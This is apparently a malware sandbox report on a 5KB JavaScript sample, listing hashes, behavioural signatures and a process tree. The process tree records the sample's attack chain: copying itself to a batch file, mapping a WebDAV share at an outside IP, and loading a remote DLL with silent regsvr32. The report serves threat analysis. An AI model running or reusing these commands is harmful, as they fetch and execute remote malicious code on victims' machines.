Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 07:09
Static task
static1
Behavioral task
behavioral1
Sample
2727240823238218669.js
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2727240823238218669.js
Resource
win10v2004-20240704-en
General
-
Target
2727240823238218669.js
-
Size
5KB
-
MD5
f95dec38745edcbb9c3d22555d77c94a
-
SHA1
0934c767e1907110c81aa0fac8d809a967d4f4e7
-
SHA256
6547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
-
SHA512
eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd
-
SSDEEP
96:xb/BBwzXIxcccQgZXIxcccRl9OYlvN7SKWN1Ft2B3+us2Eeep2B1ikV:pjwZP9vWl8B33xEPAB1ikV
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2864 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2352 wrote to memory of 296 2352 wscript.exe 30 PID 2352 wrote to memory of 296 2352 wscript.exe 30 PID 2352 wrote to memory of 296 2352 wscript.exe 30 PID 296 wrote to memory of 2620 296 cmd.exe 32 PID 296 wrote to memory of 2620 296 cmd.exe 32 PID 296 wrote to memory of 2620 296 cmd.exe 32 PID 296 wrote to memory of 2864 296 cmd.exe 33 PID 296 wrote to memory of 2864 296 cmd.exe 33 PID 296 wrote to memory of 2864 296 cmd.exe 33 PID 296 wrote to memory of 2864 296 cmd.exe 33 PID 296 wrote to memory of 2864 296 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2727240823238218669.js" "C:\Users\Admin\\flaldb.bat" && "C:\Users\Admin\\flaldb.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2620
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\303.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2864
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5f95dec38745edcbb9c3d22555d77c94a
SHA10934c767e1907110c81aa0fac8d809a967d4f4e7
SHA2566547ae56e683d062433e3083d802a4504fb9e592894a6e2d75e4e4947a4efdd8
SHA512eb825306f2b43feb22cd19f6f19bf4f306d705ac71870e2369173e607f64563f9573f16de756e817587e97092948982364f9cfcf3046fc0891ad49141281cabd